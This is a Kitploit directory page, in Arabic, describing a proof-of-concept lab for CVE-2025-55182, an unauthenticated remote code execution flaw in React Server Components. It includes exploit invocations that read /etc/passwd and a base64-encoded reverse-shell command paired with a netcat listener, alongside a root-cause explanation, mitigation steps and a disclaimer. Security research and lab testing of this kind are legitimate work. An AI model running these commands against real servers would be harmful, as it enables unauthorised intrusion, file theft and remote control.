Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell-lab — CVE-2025-55182 مختبر React2Shell لإثبات المفهوم | Kitploit
أدوات/GitHubGitHub/alsaut1/react2shell-lab
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولاتمختبرات وتدريب عملي
GitHubalsaut1/react2shell-lab

react2shell-lab

7منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 مختبر React2Shell لإثبات المفهوم

عرض المستودع

مختبر React2Shell - CVE-2025-55182

مختبر شامل لعرض واختبار الثغرة الحرجة CVE-2025-55182 في مكوّنات React Server.

⚠️ للأغراض التعليمية فقط

هذا المستودع مخصّص لـ:

  • البحث والتعليم الأمني
  • فهم آليات الثغرات
  • الاختبار على أنظمتك الخاصة
  • التحضير لصيد المكافآت الأمنية (Bug Bounty)

لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الوصول غير المصرح به غير قانوني.

🔴 تفاصيل الثغرة

  • معرّف CVE: CVE-2025-55182
  • درجة CVSS: 10.0 (حرجة)
  • النوع: تنفيذ أكواد عن بُعد دون مصادقة (RCE)
  • المكوّنات المتأثرة:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • السبب الجذري: إلغاء تسلسل غير آمن في بروتوكول "Flight" لمكوّنات React Server

⚡ الإمكانات

✅ تنفيذ أوامر عشوائية دون مصادقة
✅ قراءة ملفات النظام
✅ إنشاء الملفات وتعديلها
✅ إنشاء اتصالات شل عكسية (Reverse Shell)
✅ تحقيق سيطرة كاملة على الخادم

🚀 البدء السريع

1. التثبيت

root@kitploit:~
npm install --legacy-peer-deps
npm run dev

سيبدأ الخادم على http://localhost:3000

2. التحقق من الثغرة

root@kitploit:~
bash check-cve.sh

3. تشغيل الاستغلالات

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. الشل العكسي

root@kitploit:~
# Terminal 1 - Listener
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 بنية المشروع

root@kitploit:~
├── app/              # Vulnerable Next.js application
├── exploit/          # Working PoC exploit
│   └── rce_final.py  # Main exploit script
├── check-cve.sh      # Automated vulnerability checker
├── package.json      # Vulnerable dependencies
└── README.md

🔧 التفاصيل التقنية

توجد الثغرة في منطق إلغاء التسلسل لحمولات مكوّنات React Server. يستغل الاستغلال تلوّث النموذج الأولي (Prototype Pollution) لتنفيذ أكواد عشوائية عبر process.mainModule.require('child_process').execSync().

تسلسل الهجوم

  1. اصنع بيانات نموذج متعددة الأجزاء (multipart) خبيثة
  2. أرسلها إلى تطبيق React المعرّض للثغرة
  3. استغل إلغاء التسلسل غير الآمن في بروتوكول "Flight"
  4. حقّق تنفيذ أكواد عن بُعد (RCE) على الخادم

📊 الأثر

  • السرية: عالية (قراءة أي ملف)
  • السلامة: عالية (تعديل/إنشاء الملفات)
  • التوافر: عالٍ (تنفيذ أوامر حجب الخدمة)

✅ التخفيف

  1. حدّث React إلى 19.2.1 أو أحدث
  2. حدّث Next.js إلى 15.0.5+ أو 16.0.7+
  3. انشر قواعد جدار حماية تطبيقات الويب (WAF)
  4. راقب سجلات الخادم بحثًا عن محاولات الاستغلال
  5. استخدم آليات حماية وقت التشغيل

📚 المراجع

  • react2shell.com
  • تفاصيل CVE-2025-55182
  • نشرة React الأمنية
  • حاسبة CVSS

⚖️ إخلاء المسؤولية القانوني

هذا الكود مقدَّم لأغراض تعليمية واختبار أمني مصرح به فقط. يتحمّل المستخدمون مسؤولية ضمان حصولهم على التصريح المناسب قبل اختبار أي أنظمة. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قوانين مثل قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) والتشريعات المماثلة في الولايات القضائية الأخرى.

لا يتحمّل المؤلف أي مسؤولية عن إساءة استخدام هذه المعلومات.

🎓 مخرجات التعلّم

بعد العمل في هذا المختبر، ستفهم:

  • كيف تعمل ثغرات إلغاء التسلسل غير الآمن
  • تقنيات هجمات تلوّث النموذج الأولي (Prototype Pollution)
  • بنية مكوّنات React Server
  • طرق استغلال تنفيذ الأكواد عن بُعد (RCE)
  • الممارسات السليمة للإفصاح عن الثغرات
تنزيل الأداة